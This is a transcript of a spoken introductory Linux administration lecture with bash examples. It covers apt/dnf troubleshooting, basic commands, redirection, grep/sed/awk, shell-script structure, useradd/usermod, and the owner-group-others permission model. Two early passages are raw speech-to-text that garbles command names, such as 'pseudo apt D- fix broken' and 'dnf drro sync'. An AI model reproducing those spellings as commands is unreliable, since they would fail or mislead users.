Thankfully, troubleshooting package issues isn't something you have to do in super granular detail either; you just need to run a certain series of commands. Take a locked database: if the package manager is locked on a Debian-based system (Ubuntu, for example), it means another package-management process is running or didn't terminate correctly. What you want to do is remove that lock: sudo rm removes the lock file at its location — the file used to lock the package database while apt is running. Again, you'll get the notification: your terminal will tell you this can't work because something else is happening, or something didn't terminate correctly, and then you run sudo rm on that lock file's full path and it works again.
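Sketched out below; the lock-file paths shown are the typical ones on a modern Debian/Ubuntu system, and you should only remove them once you're sure no apt/dpkg process is actually running:

```bash
# Routine maintenance.
sudo apt update && sudo apt upgrade   # Debian/Ubuntu
sudo dnf upgrade                      # Red Hat family
sudo apt autoremove                   # clear orphaned dependencies

# Clear a stuck package-database lock (Debian-based).
sudo rm /var/lib/dpkg/lock-frontend
sudo rm /var/lib/dpkg/lock
```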
outdated or it’s not the correct version any kind of conflict that would fall under a broken dependency you can do uh a fixed broken command so pseudo apt D- fix broken and then install so it tells app to uh fix broken dependencies by automatically installing or removing packages that are necessary and then dnf check will check for dependency issues and report them and then you can use dnf drro sync to synchronized installed packages to the versions in their repositories to make sure that all the dependency issues are resolved so again this is what’s really awesome about these package managers you don’t have to do the manual hunting of oh my God I got to go fix this I got a lot of these things are automated so you just run a command and it’ll just automatically install or remove packages that are necessary it’s like it’s so freaking useful but you just need to know that you can do this right and then you need to know what the command is so uh by the end of this whole thing you’re going to have a dictionary of commands that you can run to take care of a variety of different things which is just I think it’s super freaking useful so um there we go this the broken dependencies and then we have repository issues so repositories can be unavailable or misconfigured causing issues with the package management to resolve this you might need to reenable or update your repository resources and uh those things can be done using the various resources lists or uh the locations that are on the sources list so uh app sources list or the app sources list. D both of those are very useful on the debbas system so you can view the sources list in those regards and just see if it needs to be updated or the sources or the links or something might not be right um and then one of those one of the most powerful tools for that is just copy the contents of it and then take it to gemini or GPT and paste it and say hey does this look is something wrong with this and it’ll tell you if something’s missing or if something’s wrong um and then Red Hat systems check the repository file in the Etsy yum repos directory and that you can just make sure that all the sources for your repos are all good however if you don’t want to do all of that if you don’t want to go to GPT or whatever you can just run these commands right because they’re automated and they can just make sure everything is all good so if you run uh for AP you can run apt update for dnf you could run a make cache or dnf update date for yum you could make a cache or do a yum update info and then Pac-Man you can do this as well and essentially they’ll just make sure that the URLs and your repository files are correct and accessible and they’ll make sure that everything on your sources list is up to date and current so again you don’t need to do a lot of these things you don’t have to do manually because these amazing package managers will automate a lot of that processes for you and just make sure your sources are up to date make sure all the dependencies are up to date make sure the versions are current and if there’s any bugs or anything that’s been patched all the security vulnerabilities all of that stuff is taken care of by running regular updates and regular removals as well so make sure that the removals and the updates are being done in tandem to get rid of anything that might be orphaned or uh out of date and to make sure that everything that needs to be updated is updated to uh make sure that everything is all good you got to update the package list and 
those are literally the commands that do all of that for you. Sometimes, though, you might need to restart the system or restart your shell. Usually just running the update command is enough, but restarting the shell can do wonders when the update commands aren't making everything run properly, and if that fails, you can restart the system — that guarantees everything, including your package lists, is updated and current.

All right, now that you have Linux installed: hopefully you took some time to set up your own version on a USB so you can boot it live, or you have it installed on your computer as its operating system, or you're using a virtual machine, or TryHackMe's Linux-based virtual machines, or you simply have a Linux computer — whatever it is, hopefully you're now in an environment where you can actually run these commands. If you're on macOS, you can run most of them as well; if some are missing you may need to install them using one of the package managers. In either case, I'd say do it in a Linux environment: download Kali Linux or a version of Ubuntu, whatever it may be, so you'll have no problems and can rest assured that you can run all of the commands that are coming up.

What we're going to do is an overview, because we're technically still in the lecture portion of this training series: I'm going to show you what these commands are, tell you what they do and the purposes they serve, and then when we get to the second portion — the practical exercises — you'll get plenty of chances to run all of these commands in a live environment, watch me run them, look at the output they produce, and combine a variety of these pieces. We'll talk about the basics of the command line and the basics of scripting so you have an idea of what it all looks like — the syntax and the general structure — then we'll go through the other chapters, and when we come back at chapter 12 we'll actually run all of the commands as well. That's where we are right now.

The essential command-line tools and navigation are what we'll look at. All of these commands yield some kind of information about the system you're logged into. whoami gets you the currently logged-in username — and by the way, all of these commands are case sensitive, so if you type it with a capital W it's not going to work. uname displays detailed information about the Linux machine you're on, including the hardware, the installation, the name and version of the Linux distribution, the OS kernel version, and so on; there are various options that go along with uname as well. This is just uname by itself — other options or flags attached to it get you different results — but uname is typically about the detailed information of the machine: the hardware, the name, and the OS kernel.
Then you have hostname, which gives you the host's name — on my setup, the VPS host name — and other related info; depending on which flag you run with it, it prints different information about that host. With no option, it just prints the host name; the -i flag (lowercase i) checks the server's IP address; lowercase -a prints the host name aliases; and uppercase -A gets the system's fully qualified domain name, also known as the FQDN.

There is a difference between whoami and hostname. whoami is just the user — whoever you are as the logged-in user. There can be multiple users logged in on the same host, and that host is the same machine; so there could be multiple users, but technically they're all on the same host machine. whoami is specific to the actual user that's logged in; uname is specific to the hardware of the machine, the name, the OS kernel, and so on; and hostname is relevant to the actual host you're logged in on — typically that machine — along with its IP address, its host name alias if there is one, and its fully qualified domain name. Another way to look at it: the username is assigned to a specific user on a computer network, while the hostname is a label assigned to the device on the network, essentially identifying the computer itself rather than the individual user. There'd be an IP address and a MAC address that come under the host name data, versus the username, which belongs to that individual person. So the username is the login name, the hostname is the name of the computer on the network, and that's not to be confused with uname, which brings up various data points about the computer itself — the hardware, the OS version, and so on.
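All of these identity commands in one place:

```bash
whoami        # current logged-in username (case sensitive!)
uname         # kernel name
uname -a      # all the details: kernel version, hardware, etc.
hostname      # the machine's host name
hostname -i   # the host's IP address
hostname -a   # host name aliases
hostname -A   # fully qualified domain name(s) — the FQDN
```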
Next comes interacting with individual files and directories: creating, copying, and moving them. `touch` creates a file: you run `touch` followed by the file name. You can give it a full path to place the file in a specific directory, but typically you'd already be inside the directory, say the documents folder, and run `touch file.txt`, and it creates file.txt for you. There are options you can attach as well, which we'll get into in the practical section, but `touch` is designed to create a new, empty file, either in the directory you're in or at the path you provide.

`mkdir` stands for make directory, and it creates one or more directories: `mkdir`, then any options, then the name of directory one, directory two, and so on. Again, that can be a full path, or you can be inside a folder and create a new directory there. The distinction is that `mkdir` creates a folder that can house other files and folders, whereas `touch` creates a plain file; don't expect a file created by `touch` to act as a container for anything else, because it won't.

`cp` copies a file or a directory, and when it copies a directory (use `cp -r` for that), it also copies everything inside it. You run `cp`, then the source (the thing you want to copy), then the destination (where you want the copy to go). If the copy is going into the same folder you're in, you just give it a different name so the two don't collide: to copy `file`, the second argument could be `file2`, and both will sit in the same directory. Or you can tell it to take a file from your current directory and copy it to an entirely different location by giving the full path as the destination.

`mv` is similar, but instead of copying, it takes the original file and transfers it out of wherever it's sitting to a different location. You can also use it for renaming: `mv` with the old name and a new location transfers the file there, while `mv` with the old name and a new name simply renames the file without copying anything. Keep that in mind: when you move a file you're not duplicating it, you're transferring the exact file itself, or just renaming it in place.
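Here's a minimal sketch of those four commands together (the file and directory names are just placeholders):

```bash
touch file.txt                  # create an empty file in the current directory
mkdir projects archive          # create two directories at once
cp file.txt file2.txt           # copy within the same directory under a new name
cp -r projects /tmp/projects    # -r is required to copy a directory and its contents
mv file2.txt archive/           # move the file into the archive directory
mv file.txt notes.txt           # same command, used here to rename
```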
`rm` removes a file, and with the `-r` flag it deletes an entire directory along with everything inside it. There's also `rmdir`, which removes a directory, but note the difference: `rmdir` only works on empty directories, while `rm -r` recursively deletes a directory and all of its contents. Keep in mind that when you remove a directory this way, you're also removing everything housed inside it, so if you need any of that content, make copies of it or move it elsewhere before you delete the directory.

`file` reports the file type of whatever name you give it: either a path or a file in your current folder. It'll tell you whether it's a text file, a Python file, a CSV (comma-separated values) file, and so on. Believe it or not, this is very useful, especially once you get into scripting, because certain interactions only work with certain file types: you need to know what type you're dealing with, and if it's the type you want, you then use the set of commands that can interact with it.

`zip` compresses files: it creates a zip archive from one or more files or directories that you specify. You run `zip`, any options you want, then the name of the zip file to create, then the files or folders to be compressed into it. `unzip` extracts the contents of a zip file: give it any options you need and the zip file name, and it typically extracts into whatever location the archive is already in. So make sure you're unzipping where you actually want the contents; a zipped file can hold a lot of content, and if you unzip it in the wrong place you'd have to move everything manually with `mv` afterwards. If you want the contents extracted at a specific location, move the zip file there first, then unzip it.
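A short sketch of deletion, type inspection, and archiving (file names are placeholders):

```bash
rm notes.txt                # delete a single file
rm -r old_project           # delete a directory and everything in it
rmdir empty_dir             # works only if the directory is empty

file report.csv             # e.g. "report.csv: CSV text"
zip backup.zip notes.txt report.csv   # create backup.zip from two files
unzip backup.zip            # extract into the current directory
```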
The `tar` command bundles multiple files and directories into a single archive, but it doesn't compress them: you run `tar`, the archive file name, then the files to include. It's good for creating archives whose contents you can interact with without having to decompress anything; when you zip something it gets compressed, and you'd have to unzip it to work with it, whereas `tar` just bundles multiple files into one location, known as an archive.

Next, some key operators you need to keep in mind, and this is actually very important because you'll be using them very frequently. The first is the greater-than symbol, `>`, which redirects the output of any command into a file. For example, `echo "file contents"` by itself just prints the text onto the screen, but `echo "file contents" > newfile.txt` takes that output, or the output of any given command really, and puts it inside the file. Be careful: `>` overwrites anything currently inside the file. If you want to append, to add data to a file while keeping what's already there, use the double symbol `>>` instead, because the single one literally overwrites everything inside the file and you lose whatever was previously in it.

More often than not you'll run a command that analyzes something, and we do this a lot in security, say `top` or `tcpdump`, and instead of letting a huge amount of content scroll across the screen, you redirect the output into a file so you can review and manipulate it later. For scripting this is very important to understand: usually you don't want a script to overwrite its output file on every run, you want each run to append its results to the file. So `>` overwrites the file (or creates a new one), and `>>` appends, keeping everything that was previously inside.

Then there's the ampersand, `&`. You place it at the end of a command, especially a big one that takes a long time to process, so the command runs in the background. While it's backgrounded you can keep using your command line instead of waiting for it to finish. For example, if we run something large and redirect its results to a file, putting an ampersand at the end lets it do its work and create our output file while we continue running whatever other commands we want.
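A sketch of redirection and backgrounding (the archived paths are illustrative; `-c` and `-f` are tar's create and file-name flags, which we gloss over here):

```bash
echo "first line"  > output.txt     # > creates or overwrites output.txt
echo "second line" >> output.txt    # >> appends, keeping existing content

tar -cf logs.tar /var/log/*.log &   # & backgrounds the long-running job;
                                    # the prompt returns immediately
```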
The double ampersand, `&&`, chains multiple commands together, running each one only if the previous command succeeded. So you can `touch` a new file, `echo` onto the screen that a new file was created, and then echo contents into the file you just made; technically you're running three commands: create a file, announce that it was created, add whatever contents you want to it. This is very useful when you know what you're doing and want to get a lot done without typing a command, pressing enter, waiting, and repeating. Instead you combine a series of commands, press enter once, and the whole thing runs; if you put notifications between the steps, you'll see exactly where you are in the process, and it finishes quickly. To recap: a single `&` at the end of a command runs it in the background, while `&&` strings together as many commands as you want. Though if you find yourself chaining a large number of commands, at that point you might as well write a script, which we'll get to in a bit. So far, those are the key operators.

Once you've created files, or when you have a bunch of files you're trying to view, there are a few ways to do it. `cat`, short for concatenate, prints the entire contents of a file onto the terminal. If it's a massive file there's going to be a very large output, and since terminals limit how many lines they keep, you may lose everything at the very top of the file; this happens most often with log files. For a very large log file, instead of `cat`-ing everything to the terminal, use `less` or `more` to view it page by page: run `less` with the file name and use the arrow keys on your keyboard to move from page to page.

`head` and `tail` display the first or last 10 lines respectively, and you can choose how many lines you want: `tail -n 10` displays the last 10 lines of the file, `tail -n 5` the last five. This is very useful when you know where the data you need lives: if you want the headers of a file, you look at the top lines, and if you want the most recent data, which is typically at the bottom of any given log file, you take the last 10 or five lines, so you can see the newest entries instead of scrolling back and forth trying to find them.
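A brief sketch combining chaining and file viewing (file names and paths are placeholders):

```bash
touch report.txt && echo "report created" && echo "initial data" >> report.txt

cat report.txt              # print the whole file
less /var/log/syslog        # page through a large file (q to quit)
head -n 10 data.csv         # the first 10 lines, e.g. headers
tail -n 5 /var/log/syslog   # the five most recent log entries
```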
Then there's `find`, which is very useful when you roughly know what you're looking for but not where it is. You run `find` followed by a path to search: a plain `/` represents the root, meaning every folder on the entire machine, or you could give it, say, the path to your documents folder to search only there. Then you add criteria, for example `-name` to search by name, followed by the name you want it to look for. We're going to do a lot of this, because it's genuinely useful.

`locate` is essentially the same idea: `locate keyword` prints the file's location onto the screen. Depending on where you're at and what type of machine you're on, `locate` may not give you results where `find` does, or vice versa, but they do the same job. The practical difference is that `find` needs a location to search within, and it can also match on file type, permissions, and so on, whereas `locate` just looks up the keyword and tells you where the path is.

Next, our common text editors: `nano` and `vim` are the most common text editors available on Linux. Nano is very user friendly; Vim is also user friendly in my opinion, just not as straightforward to deal with. For example, `nano file.txt` opens file.txt, and if nothing called file.txt exists, it creates it, much like the `touch` command, except that you can immediately start writing inside the file. If the file already has content, opening it with nano lets you interact with that content: look at everything, scroll back and forth through a massive file instead of `cat`-ing it to your display, and edit as you wish. When you're done, Ctrl+O saves any changes you've made and Ctrl+X exits; Ctrl+K cuts the current line, and Ctrl+W ("where is") searches for text. There are many more options, but those are some of the common ones; again, we'll go through all of this, so these are just overviews.

Vim is the other editor, and while it's said to have a steep learning curve, in my opinion it doesn't. It has distinct modes: it can be open just to read something, open to insert something, or in visual mode, and it has some fairly deep options beyond that; there's plenty of help and manual material for all of these things, so you won't be left to the wolves, so to speak. Press `i` to enter insert mode. Once you're inside vim and done with everything, `:w` writes (saves) the file, `:q` quits, `:wq` saves and quits, and so on; you can search for any given pattern, and `dd` deletes a line. These are just common options.
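A sketch of searching and editing (note that `locate` relies on a prebuilt file database, so it may need to be installed and updated on some systems):

```bash
find / -name "notes.txt"          # search the whole filesystem by name
find ~/documents -name "*.csv"    # search only a known directory
locate notes.txt                  # query the file database for the path

nano file.txt    # Ctrl+O save, Ctrl+X exit, Ctrl+K cut line, Ctrl+W search
vim file.txt     # i to insert; :w save, :q quit, :wq both, dd delete a line
```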
You're not expected to memorize these right now; when we get to the practical section we'll simply start using these tools, and that will reinforce everything we're covering here. I just want you to be aware of the editors so we don't have to stop for an overview later.

All right, now we go another level deeper into dealing with files: manipulating them and searching through them. `grep` is a tool you'll use very frequently because it's very powerful, and it searches for things. It stands for global regular expression print, but you don't need to know that; just know that grep searches. You can search for text within files, typically a pattern or a word, or even an actual regular expression, and then you give it the location to search within. Useful flags: `-i` makes the search case insensitive, so it matches without worrying about capital versus lowercase letters; `-r` makes it a recursive search, so instead of a single file you can point it at a directory and it searches everything inside; and `-v` inverts the match, showing the lines that do not match the pattern. Say there's a lot of noise all tied to one event ID and you want everything except that: `grep -v` with that event ID shows every line that doesn't match it. You can also pipe the output of another command into grep so that it searches that output for you; a very simple example is `cat` on a file piped into `grep` to search through that file's data, and you'll do that a lot.

`sort` arranges contents in a specific order, and you can combine it with grep: grep for something you know will return a lot of data, then sort that data before it's printed to the screen. By itself, `sort` orders alphabetically from A to Z, which we can call ascending order; `sort -r` reverses it, Z to A, descending. You can also sort numerically using the `-n` flag, and reverse that with `-r` as well, so it's very flexible, and there are a lot of different ways to interact with it.
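A sketch of grep and sort in practice (log paths and patterns are illustrative):

```bash
grep -i "error" /var/log/syslog       # case-insensitive search in one file
grep -r "TODO" ~/projects             # recursive search through a directory
grep -v "event_id=4624" auth.log      # every line that does NOT match

grep "error" app.log | sort           # pipe matches into an A-to-Z sort
sort -nr scores.txt                   # numeric sort, largest values first
```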
`cut` takes certain pieces of data, certain columns, from a result or file. So you grep for something, and instead of keeping every full line that comes back, you want just the first column or the first two columns: you provide cut's options and it cuts those fields out of the results for you.

Then there's `sed`, the stream editor. A data stream is just another way to look at the text inside a file, and sometimes the text you're dealing with isn't plain text the way you see it on screen; it may be formatted or encoded in some way, Base64 encoding for example, and you want to display or transform certain things within it. With its substitute command, sed finds a pattern, call it "old", and replaces it with "new": the first part is the data to find, the second is what replaces it, and it does that for the first instance on every line where the pattern appears. That only changes the output; if you actually want to transform the contents inside the file, you use the `-i` flag, which performs in-place editing. You may not always want that; often you just want to search and display the results, so `-i` should be used cautiously. But that's what the stream editor does for us.

If you want to extract data from things that have fields, typically something like a CSV file, where each field has a value, `awk` is the tool. The basic usage prints the first column, which is what I mean by field-based: CSV files are separated by commas and turn into a spreadsheet, for example, and with that kind of fielded data you can extract exactly the columns you want; in the simple case, awk takes the very first column of file.txt and prints everything inside it. You can also give it a condition: if the third column is greater than 50, print columns one and three, where column one might be the name of the line item and column three the value associated with it. So: if the value in column 3 is greater than 50, print that item's name and its value. You're giving it conditional logic, which is basically a little script, a conditional statement, and that's the perfect segue into shell scripting.
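A sketch of these three extraction tools (file names and the column condition come from the example above):

```bash
cut -d',' -f1,2 data.csv              # fields 1 and 2, comma-delimited

sed 's/old/new/' file.txt             # replace the first "old" per line (display only)
sed -i 's/old/new/g' file.txt         # -i edits in place; g replaces every instance

awk '{print $1}' file.txt             # print the first column
awk '$3 > 50 {print $1, $3}' file.txt # name and value wherever column 3 exceeds 50
```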
So, setting up a simple shell script. We've already talked about parts of this, so I won't spend too much time here. First and foremost, create the script: `touch script.sh` is the basic command for that. Then add a shebang line, which we've discussed, at the very top: the very first line of script.sh is the shebang, and you have to put it at the top of every single script for it to actually run as a script. The shebang names the interpreter; without it, the file is just a bunch of lines of supposed code with no interpreter, and it won't be executed as a script.

Once the file has your code in it, you need to make it executable, which is done by changing its permissions. `chmod`, which we'll revisit when we get into permissions, stands for change mode, and a plus adds a permission: in this case we're adding `x`, the executable permission, to script.sh. Change mode, add executable permission to the script; that's the general outline of the permission change. To remove the executable permission you'd do minus x instead, and that's basically how adding and removing permissions works. Fairly simple.

Now suppose you want to create variables inside your script. In this particular case, the first variable is `name="LinuxGPT"`: `name` is the variable name, and the single equals sign is the assignment operator, assigning this value to it. (Two equals signs make a comparison operator, which we'll talk about in a bit; a single equals sign always assigns.) So the string "LinuxGPT" is now assigned to the variable `name`, and you refer to the variable with a dollar sign: `echo $name` prints LinuxGPT onto the screen, or wherever it's needed, because we've assigned that string to that variable. Very simple.

You can also substitute in a command by assigning its output to a variable. To do that, you write a dollar sign with the command inside parentheses. If I just typed `date` into my terminal, it would give me the current date and time; but to store the value of that command in a variable, I write `date=$(date)`, and now the command's output is assigned to that variable. You could equally do `name=$(uname)`, and all the data that command reports about the machine gets stored in the variable. So you can assign text (strings) to a variable, or the output of another command; both are assignments, because both use a single equals sign, and you're just choosing the type of value to assign.
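Putting those pieces together, a minimal first script might look like this (the variable values are just examples):

```bash
#!/bin/bash
# script.sh — created with: touch script.sh && chmod +x script.sh

name="LinuxGPT"       # a single = assigns a string
today=$(date)         # command substitution stores the command's output

echo "Hello, $name"
echo "It is now: $today"
```

After making it executable, run it with `./script.sh`.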
Once you have your variables, you can write a conditional statement if you need one. A conditional statement is very basic: if something, do something; else, do something different; and then you have to close it with `fi` at the end. I like to think of it as short for "finish", but it's really just "if" spelled backwards, and that's how scripting works in the shell language.

Looking at this particular conditional statement: after `if`, inside the brackets, comes the first condition, say, whether a variable equals some value. Notice that we're now looking at a double equals sign, so it's comparative: before, the single equals sign assigned the value, but now you're comparing, saying "if the value of this variable equals the value we're looking for". Then comes a semicolon, then `then`, and the body: print onto the screen that the condition has been met. Notice the indentation; typically it's at least two or four spaces for reader friendliness, and I recommend you always use four. If the condition hasn't been met, that's what `else` is for: it just prints that the condition has not been met. Then `fi` finishes it, and that's the full basic structure.

If any of these pieces is missing, the entire conditional statement won't work: leave out the semicolon and it fails; leave out the `fi` at the end and it fails. Usually you'll get some kind of notification that there's an error on line such-and-such, something is missing or the syntax is wrong, and you can debug your code accordingly. But it's very important to understand that everything in this block of code has to be there: if the closing quotation mark is missing, you'll get an error, and if you use a single equals sign where a comparison belongs, that's a logic error, because you'd be trying to reassign a variable that already holds a value rather than testing it. If the dollar sign is missing, it won't work either. Scripting is very precise: once all the details are there, it works like a charm, but if they're not, you'll have a lot of issues.

That's the basic structure of a conditional statement; now for the comparison operators. Here we compared for equality, but you can also test whether a value is less than (`-lt`) or greater than (`-gt`) the value you want, less than or equal to (`-le`), greater than or equal to (`-ge`), equal to (`-eq`), or not equal to (`-ne`). All of these operators have to do with numbers: if you're going to use any of them, you're comparing integers.
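As a minimal sketch of that structure (the variable names and values are placeholders):

```bash
#!/bin/bash
status="active"
count=7

if [ "$status" == "active" ]; then
    echo "the condition has been met"
else
    echo "the condition has not been met"
fi

if [ $count -ge 5 ]; then    # numeric comparisons use -eq, -ne, -lt, -le, -gt, -ge
    echo "count is at least 5"
fi
```

Every token matters: the spaces inside the brackets, the semicolon before `then`, and the closing `fi`.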
The operators below those are for strings. A double equals sign compares the value of a string; in our example the value is a string, so we use `==`: if this equals that, do the following. An exclamation mark with an equals sign, `!=`, means it does not equal. That's a lot of "equals" in one explanation, and I'm almost losing myself in it, but the summary is simple: two equals signs mean the values match, an exclamation-equals means they don't.

And this is where a lot of the automation comes in. What we're looking at is very basic, but it's the foundation of automating tasks: for each item in a list, do something. In this case: `for item in 1 2 3`, echo that item, and it prints 1, 2, and 3, one per line. The loop variable can be essentially anything: it could be `for i in 1 2 3; do echo $i; done`, or `for value in ...`; the name is just another variable that gets assigned within this particular loop, and in many cases it's a single letter or any word you like. The list here is a simple literal one, but it could just as well be a variable storing a massive list. You need the semicolon to separate the list from the `do`, then the action you want performed, and then `done` when you're finished; `done` has to be there for this block of code to be complete. It's kind of similar to what we do in Python, except Python doesn't use `do` and `done`, but I don't want to confuse you.

This is a for loop, and it can iterate over a list, where the list might be a completely separate variable housing a bunch of data, or a variable reading from a separate file whose contents you step through. There's a lot you can do with for loops; this is a very, very simple one, but for loops are the essence of automation, and one of the most powerful things you'll learn when we get into advanced scripting is building complex for loops: inside a for loop you can have an if statement, or another for loop, and as long as your indentation is correct, everything runs smoothly. Keep the structure in mind: a for loop has a header, the `for ... do` line, and a body, the commands inside.
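A sketch of the loop just described, plus a common file-iteration variant (the log path is illustrative):

```bash
#!/bin/bash
# iterate over a literal list: prints 1, 2, 3, one per line
for item in 1 2 3; do
    echo "$item"
done

# the same idea over files, a typical automation pattern
for f in /var/log/*.log; do
    echo "Processing $f"
done
```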
The same applies to our if statement: there's the header of the `if`, then its body, then `else`, which is another header, then the body of the else portion, and then the `fi` at the very end. The indentation is very important, and as we get into writing scripts you'll notice how these things fit together.

So that's the for loop; then there's the while loop. A while loop runs as long as its condition is true, so it has a condition that needs to be met. For example, `counter=1` is our variable. Then: while the variable `counter` is less than or equal to 5, echo the counter, and then, inside the loop body (remember the indentation), reassign the counter to its previous value plus one. On the first iteration it prints 1 onto the screen, then adds one to the variable, which makes it 2. It loops back, checks the condition, sees that 2 is still less than or equal to 5, prints it, adds one to make it 3, and keeps going: 3, then 4, then 5, each time checking the condition at the top, printing the value, and incrementing. After printing 5, the increment makes the counter 6, and when the loop goes back up and asks "is this less than or equal to 5?", the answer is no, the condition is now false, and the loop stops. So a while loop keeps running as long as the condition is true: here, while the variable is less than or equal to 5, print it and add one; once the counter passes 5, the condition becomes false and it can't continue. That's what while loops are and how they work.
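The counter example from above, written out as a runnable sketch:

```bash
#!/bin/bash
counter=1

while [ $counter -le 5 ]; do
    echo "$counter"
    counter=$((counter + 1))   # reassign: the previous value plus one
done
# prints 1 through 5; when counter reaches 6 the condition is false and the loop exits
```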
All right, now that you know how the system and the file system work, and how to create and manipulate files, it's time to move on to the users: the actual human beings who will be using the system. This is where a lot of the roles and responsibilities of a system administrator come in, because there's more to the job than the system itself, which is fairly simple to handle once you understand how to find the guides and the manuals; now you have to learn how to deal with the people, and manage the users and the groups they're in.

First and foremost, creating users. Depending on the distribution you're on, it'll be one of two commands, `useradd` or `adduser`, and it requires sudo permissions, basically administrator or even root permissions. At its simplest, you run the command with the username at the end, and that's literally how you add a new user. That's very simplistic, though; typically you'd run multiple options along with your `useradd` command to handle several things at once, although you can also run them after the fact. After creating the user, you'd first set up a password for them (which also requires sudo; I'll show you specifically what that looks like), and then assign them a home directory.

For the home directory, the default behavior with just the `-m` flag, as in `useradd -m alice`, is to create the user's home directory at /home/alice, which is where user home directories live, based on what we've already learned about the file system. If you want to declare a specific directory for that user instead, you add `-m` together with `-d` and the path where you want their home directory to be, in this case /data/users/alice, followed by the username being added. So you're adding a user and declaring where their home directory goes by supplying those two flags and the path.

You can also specify the user's login shell: again you're adding a new user, and `-s` followed by the shell binary's path sets their login shell, with the username at the end. And there are supplementary groups (group management is coming up shortly, and we'll do all of this hands-on in the practical portion; I feel like I have to keep saying that, because I know I'm glossing over details): `sudo useradd` with a capital `-G`, where developers is one group and admins another, adds alice to those supplementary groups.

Those are the basic pieces for adding user details; now here's a full command. We run `sudo useradd`, assign this person's home directory with `-m -d`, assign their shell with `-s`, add them to the supplementary groups developers and admins with `-G`, and add a comment with `-c`, a basic note for this particular user, "Alex Johnson, developer", and then the final piece is the actual username itself.
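A sketch of those variations (the paths, the zsh shell location, and the names come from the example; adjust to your system):

```bash
sudo useradd -m alice                         # home directory defaults to /home/alice
sudo useradd -m -d /data/users/alice alice    # custom home directory
sudo useradd -m -s /bin/bash alice            # specify the login shell
sudo useradd -G developers,admins alice       # supplementary groups

# the full version, combining everything:
sudo useradd -m -d /data/users/alice -s /usr/bin/zsh \
     -G developers,admins -c "Alex Johnson, developer" alice
```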
To break that down: `-m` creates the home directory, `-d` sets the custom home directory, `-s` sets zsh as the login shell, `-G developers,admins` adds her to the developers and admins groups, and `-c` is just a comment at the very end saying who this is, mostly for the benefit of whichever system administrator looks at it later; and finally alice, the actual username of the person. It's one long command, but it does a lot when creating that user.

Then there's the password. Typically you assign a password when you create somebody and then immediately expire it, so that the next time they log in, which is the first time they officially log in, they're notified that their password has expired and they need to set a new one. So you create the user, set a password with `sudo passwd` and the username, answer the prompts that come up (what the password should be, then confirm it), and then expire the password you just assigned. From there, the next time they log in they'll be prompted to set a new password themselves. That's the very basic gist of creating a new user.

Now some basic commands for managing users. You modify an existing user's details with `usermod`: to change their username, `-l` takes the new username followed by the old username being changed; a capital `-L` locks the account and a capital `-U` unlocks it, and there's a variety of other user-modification commands we'll work with once we get to the practical section. There's also user deletion, where `userdel` with `-r` does a full cleanup: deleting the user and also removing their home directory and all of its contents. These are the basic user-management commands you'll be implementing.

Then we have creating and managing groups, which is as simple as using the `groupadd` command and specifying the group name. You can add a user to a group with `-aG`, where `a` stands for append and `G` stands for the group itself, adding them to a single group or multiple groups; this is the route outside of `useradd`, using `usermod` with lowercase `a`, uppercase `G` to append them to whatever supplementary group you choose. And of course `groupdel` deletes the group you've specified.
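A sketch of that lifecycle end to end (usernames are placeholders; `passwd -e` is the expiry flag described above):

```bash
sudo passwd alice            # set the initial password (interactive prompts)
sudo passwd -e alice         # expire it so she must choose her own at first login

sudo usermod -l anna alice   # rename: new name first, old name second
sudo usermod -L anna         # lock the account
sudo usermod -U anna         # unlock it
sudo userdel -r anna         # delete the user AND her home directory

sudo groupadd developers     # create a group
sudo usermod -aG developers,admins anna   # append to supplementary groups
sudo groupdel developers     # delete a group
```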
user there’s going to be a new group that’s created by their name so if it’s Alice as the user there’s going to be a new group named Alice that’s going to be created inside of your group’s directory and that’s going to be the primary group that’s been assigned to that person so when you want to change their primary group you would use the user mod command and then you would do a lowercase G and then the name of the group itself so whatever it could be one of your existing groups it doesn’t have to be a new group that you’ve created but you’re changing the primary group of that person by doing a lowercase G flag and then assigning the group name and then the username themselves and then now you’ve changed their primary group a supplementary group is additional groups that they have access to so you know based on who they are and what permissions they have or what roles they have they could have multiple groups that they’re assigned to so they can get access to the resources that are available to all of those individual groups uh so that’s mainly the big piece that you want um and multi memberships can happen in a lot of cases in a lot of cases they do happen so for example just a a manager for example a manager will have access to the management group as well as the regular employee group for example so that they have access to all of the stuff that’s inside the manager folder as well as everything that’s inside of their own regular folder or along the other groups folder so there could be a manager they could be in marketing and they could have their own regular folder as well you know what I’m saying so they have multiple groups that they’re a part of it’s very useful for granting uh people access to different sets of files and directories owned by various groups you just have to be careful that whenever they leave that department so if they’re no longer in marketing they need to be removed from marketing unless they’ve gone up a level and they do still get access to the Marketing Group but if they’ve left Marketing in general completely and they went into Tech they shouldn’t get access to the stuff that’s inside of the marketing folder and this is mainly because that you want to protect the company from uh potential uh you know if the person Le Lees for example and there is a bunch of intellectual property that’s inside the marketing file or marketing folder and now they have access to all of the stuff inside of marketing and they can steal that IP for example that’s just an example so uh it could also protect the company from any security issues if that person gets hacked and they still had access to marketing for example and now they the hacker knows that they’re a part of that group and they go inside of the marketing folder and they see all of that IP and then they can steal that data because a system administrator didn’t remove them from that group and they should have never had access to that data to begin with so this is very important to keep in mind you can have multiple groups that somebody could be a member of you just need to be careful as you go along and as the company grows and as people’s roles change that you uh modify the groups that they’re members of because as long as they’re a member of that group they have access to everything that’s inside of that group um you can add or remove somebody from a supplementary Group by using the a G so lowercase a capital G and appending them to the specific group or groups that you want them to be added to so very similar to what we 
And speaking of permissions, ownership, and access, we are now in that section: the file permissions overview. The permissions model is a fundamental concept in managing access to files and directories. It ensures that only authorized users can read, write, execute, delete, or modify files, maintaining the system's security and integrity. The model involves three levels of access: the owner of the file or folder, the group, and others, which is basically everybody else, guests for example. So there's the owner of the file or folder, the group it's assigned to (which, as we've already discussed, would be the owner's primary group), and everyone else, who falls under others.

The owner is typically the user who created the file or folder. They have the highest level of control over their files and directories and can set read, write, or execute permissions on them even if they're not the root user specifically. If example.txt is owned by the user alice, she can control who else can access and modify that file.

The group level associates the file with a specific group, whose members can be given certain permissions on the file or directory. The group permissions determine what group members can do with that file or directory: like the owner, group members can have read, write, or execute permissions, whatever has been assigned to that specific group. If example.txt is associated with the developers group, all the users in developers can be given permission to read, write, or execute the file, depending on the permissions available for that group specifically. Keep that in mind, because you can modify a group's permissions, and they won't necessarily be the full read, write, and execute.

Then you have others: all the users who are neither the owner nor members of the file's group. That could be everybody outside the developers group, anybody who's not the actual owner, somebody who's a guest, and so on; as long as they're not the owner and not inside the primary group associated with the file, they fall into the others category. The others permissions determine what any other user can do with the file, and they can likewise be set to read, write, or execute, or some subset, or none of the above; they could have no permission to access it at all, depending on what the company's infrastructure is like. If example.txt has read permission for others, any user on the system can read the file regardless of their user or group status.

